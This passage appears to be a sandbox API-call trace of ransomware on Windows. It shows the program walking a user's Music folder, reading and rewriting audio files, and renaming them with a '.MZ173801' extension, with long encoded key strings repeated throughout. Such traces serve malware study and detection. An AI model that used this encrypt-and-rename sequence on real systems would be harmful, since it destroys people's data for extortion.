ftCreationTime.dwHighDateTime=0x1d5e131, ftLastAccessTime.dwLowDateTime=0x59d9f570, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0x59d9f570, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x618)) returned 1 [0117.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.488] GetCurrentThreadId () returned 0x1358 [0117.488] GetCurrentThreadId () returned 0x1358 [0117.488] GetCurrentThreadId () returned 0x1358 [0117.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.488] GetCurrentThreadId () returned 0x1358 [0117.488] GetCurrentThreadId () returned 0x1358 [0117.488] GetCurrentThreadId () returned 0x1358 [0117.489] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\_HdsGmu6OGd.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\_hdsgmu6ogd.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.489] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0117.489] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.489] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x618 [0117.489] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.489] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x618, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f14c*=0x618, lpOverlapped=0x0) returned 1 [0117.490] CloseHandle (hObject=0x408) returned 1 [0117.490] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\_HdsGmu6OGd.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\_hdsgmu6ogd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.491] WriteFile (in: hFile=0x408, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f158*=0x618, lpOverlapped=0x0) returned 1 [0117.491] CloseHandle (hObject=0x408) returned 1 [0117.492] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\_HdsGmu6OGd.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\_hdsgmu6ogd.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\_HdsGmu6OGd.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\_hdsgmu6ogd.wav.mz173801")) returned 1 [0117.496] GetCurrentThreadId () returned 0x1358 [0117.496] GetCurrentThreadId () returned 0x1358 [0117.496] GetCurrentThreadId () returned 0x1358 [0117.496] GetCurrentThreadId () returned 0x1358 [0117.496] GetCurrentThreadId () returned 0x1358 [0117.496] GetCurrentThreadId () returned 0x1358 [0117.496] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee99b50, ftCreationTime.dwHighDateTime=0x1d5e131, ftLastAccessTime.dwLowDateTime=0x59d9f570, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0x59d9f570, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="_HdsGmu6OGd.wav", cAlternateFileName="_HDSGM~1.WAV")) returned 0 [0117.496] GetLastError () returned 0x12 [0117.496] FindClose (in: hFindFile=0xa1baf0 | out: hFindFile=0xa1baf0) returned 1 [0117.496] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf121ea0, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xa74ea2c0, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa74ea2c0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0117.496] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0117.496] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.496] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf121ea0, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xa74ea2c0, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa74ea2c0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0117.496] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.496] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.496] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x367c9fa0, ftCreationTime.dwHighDateTime=0x1d5f112, ftLastAccessTime.dwLowDateTime=0xb8e19f30, ftLastAccessTime.dwHighDateTime=0x1d5e92a, ftLastWriteTime.dwLowDateTime=0xa7477c1d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xac19, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="8MMQ.m4a.MZ173801", cAlternateFileName="8MMQM4~1.MZ1")) returned 1 [0117.496] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.496] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.496] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939924c0, ftCreationTime.dwHighDateTime=0x1d5ed88, ftLastAccessTime.dwLowDateTime=0xc25786a0, ftLastAccessTime.dwHighDateTime=0x1d5e863, ftLastWriteTime.dwLowDateTime=0xa7477c1d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd09b, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="CVDQqBTbc3T7O.m4a.MZ173801", cAlternateFileName="CVDQQB~1.MZ1")) returned 1 [0117.496] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.496] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.496] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x193b0b40, ftCreationTime.dwHighDateTime=0x1d5e990, ftLastAccessTime.dwLowDateTime=0x5b4ff0d0, ftLastAccessTime.dwHighDateTime=0x1d5e5b3, ftLastWriteTime.dwLowDateTime=0x5b4ff0d0, ftLastWriteTime.dwHighDateTime=0x1d5e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="Ds2vVA7R", cAlternateFileName="")) returned 1 [0117.496] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.496] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.496] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\*.*", lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x193b0b40, ftCreationTime.dwHighDateTime=0x1d5e990, ftLastAccessTime.dwLowDateTime=0x5b4ff0d0, ftLastAccessTime.dwHighDateTime=0x1d5e5b3, ftLastWriteTime.dwLowDateTime=0x5b4ff0d0, ftLastWriteTime.dwHighDateTime=0x1d5e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1baf0 [0117.497] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x193b0b40, ftCreationTime.dwHighDateTime=0x1d5e990, ftLastAccessTime.dwLowDateTime=0x5b4ff0d0, ftLastAccessTime.dwHighDateTime=0x1d5e5b3, ftLastWriteTime.dwLowDateTime=0x5b4ff0d0, ftLastWriteTime.dwHighDateTime=0x1d5e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.497] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f55360, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0x46d66790, ftLastAccessTime.dwHighDateTime=0x1d5e213, ftLastWriteTime.dwLowDateTime=0x46d66790, ftLastWriteTime.dwHighDateTime=0x1d5e213, nFileSizeHigh=0x0, nFileSizeLow=0xd55e, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="H0Fbjn1UaDFSWci6YS.mp3", cAlternateFileName="H0FBJN~1.MP3")) returned 1 [0117.497] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef30 | out: lpLocalFileTime=0x19ef30) returned 1 [0117.497] FileTimeToDosDateTime (in: lpFileTime=0x19ef30, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.497] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\H0Fbjn1UaDFSWci6YS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\h0fbjn1uadfswci6ys.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19eec0 | out: lpFileInformation=0x19eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f55360, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0x46d66790, ftLastAccessTime.dwHighDateTime=0x1d5e213, ftLastWriteTime.dwLowDateTime=0x46d66790, ftLastWriteTime.dwHighDateTime=0x1d5e213, nFileSizeHigh=0x0, nFileSizeLow=0xd55e)) returned 1 [0117.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYz